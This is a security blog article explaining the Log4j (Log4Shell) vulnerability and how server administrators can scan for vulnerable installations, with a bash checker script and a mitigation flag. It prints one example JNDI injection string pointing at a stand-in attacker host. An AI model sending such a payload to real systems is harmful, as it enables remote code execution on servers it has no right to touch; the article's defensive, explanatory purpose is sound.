• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

How to check if the server is attacked by Log4j (Log4Shell) or not

AnonyViet by AnonyViet
January 25, 2023
in Security
0

A critical exploit in the Java library was found not long ago, disrupting much of the Internet causing server administrators to try to fix it. The very vulnerable library, log4j, is used everywhere, so you’ll need to check your servers and make sure they’re up to date.

Join the channel Telegram of the AnonyViet 👉 Link 👈

How to check if the server is attacked by Log4j (Log4Shell) or not

How does the Log4J vulnerability work?

As it turns out, the log4j vulnerability is by far one of the worst of the past few years, scoring a rare 10/10 on the CVSS scale and will haunt the entire internet for years to come.

What’s worse is that log4j isn’t an application — it’s an open-source library used by many other applications. You can’t install it directly; it can be included in other .jar files or installed by other applications as a dependency.

It basically allows attackers to send text to your application, and if it logs this text somewhere, your server will execute malicious code. The format of the text looks like this: an extremely simple string containing a link to a remote address.

${jndi:ldap://attacker.com/a}

The vulnerable component in log4j is Java Naming and Directory Interface, which allows the framework to log the execution of remote requests. Except it also decrypts the file at the endpoint and can load .class files that contain remote malware.

Is the server vulnerable to the Log4J bug?

This vulnerability was quickly patched in the latest release of log4j, 2.16.0, but the issue remains unresolved. Since log4j is a dependency, finding its specific version on your system may not be straightforward. And, because Java is so popular, many third-party tools and components can use it, so you might not even know if you’re running vulnerable Java software on your machine. are not.

Even if you think you’re not vulnerable, you still need to double-check. This vulnerability affects so many systems that it’s likely that you’re running log4j or Java without realizing it.

Fortunately, JDK versions greater than 6u211, 7u201, 8u191 and 11.0.1 are not affected by the main attack vector (using LDAP) that is currently being exploited the most. You still need to patch it, as it can easily be used with other attack vectors as well. Also, the simple act of making a request to an endpoint can expose data about machines on your network, which is also not a good thing.

The vulnerability also tells you why it’s important to keep a Software Bill of Materials (SBOM), which is basically a list of all the software on your system, where it came from, and how it was made. from where. In the future, this information can help you quickly patch attacks like this.

For now, you just need to be concerned with scanning your system for log4j versions used by the software and making a list of all vulnerable components.

How to check if the server is attacked by Log4j (Log4Shell) or not

Many people have created scripts to automatically scan the system and find vulnerable installations, such as This popular script is written in Python and this script from security company LunaSec. One of the easiest to use is this simple bash script, it can scan your packages and identify log4j versions and can also tell you whether your system is using Java or not. In most cases you will need to run multiple scans with different scripts, as there is no guarantee that these scripts will be 100% effective in identifying every vulnerable system.

You can download and run it with a few commands. You also need to run the command as root to scan your entire system.

wget https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/log4j_checker_beta.sh -q

chmod +x log4j_checker_beta.sh

sudo ./log4j_checker_beta.sh

The results from this script will tell you why this log4j vulnerability is so terrible — running this script on a server shows that it’s very vulnerable, even though I think I haven’t installed it yet Java on this machine because I’m not running any Java software.

Elasticsearch is running in the background on this machine, written in Java. You don’t have to install Java manually to have Elasticsearch; it includes a bundled version of OpenJDK. And it’s stuck to log4j so it’s very easy to exploit.

How to check if the server is attacked by Log4j (Log4Shell) or not 3

To patch Elasticsearch, you need to update all packages and follow the mitigation instructions. This can happen with any software you’re running; you will need to update log4j directly, update the software that comes with it, or fix the bug with whatever mitigation method other people are using.

If you can’t patch the jar for some reason, you can use this JVM flag to mitigate the problem, which simply tells log4j to never do any lookups when formatting messages. However, this is not recommended and you should try to install log4j 2.16.0 wherever possible to completely fix the problem.

-Dlog4j2.formatMsgNoLookups=true

The article achieved: 5/5 – (100 votes)

Tags: attackedcheckLog4jLog4ShellServer
Previous Post

How to hide your home from Google Maps

Next Post

Lesson 275: Moving Averages in Excel

AnonyViet

AnonyViet

Related Posts

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS
Security

How to intercept traffic using Burp Suite to analyze HTTP/HTTPS

April 18, 2026
How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Next Post
Lesson 275: Moving Averages in Excel

Lesson 275: Moving Averages in Excel

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

How to turn off Gemini Nano on Chrome to free up 4GB of memory

How to turn off Gemini Nano on Chrome to free up 4GB of memory

May 30, 2026
Instructions for receiving Lovable Pro 12 months for free

Instructions for receiving Lovable Pro 12 months for free

May 29, 2026
How to extract text from photos using Zalo is super simple

How to extract text from photos using Zalo is super simple

May 29, 2026
HONOR 600 in hand – High-end design, 200MP camera, not cheap price

HONOR 600 in hand – High-end design, 200MP camera, not cheap price

May 28, 2026
How to turn off Gemini Nano on Chrome to free up 4GB of memory

How to turn off Gemini Nano on Chrome to free up 4GB of memory

May 30, 2026
Instructions for receiving Lovable Pro 12 months for free

Instructions for receiving Lovable Pro 12 months for free

May 29, 2026
How to extract text from photos using Zalo is super simple

How to extract text from photos using Zalo is super simple

May 29, 2026
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

How to turn off Gemini Nano on Chrome to free up 4GB of memory

How to turn off Gemini Nano on Chrome to free up 4GB of memory

May 30, 2026
Instructions for receiving Lovable Pro 12 months for free

Instructions for receiving Lovable Pro 12 months for free

May 29, 2026
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply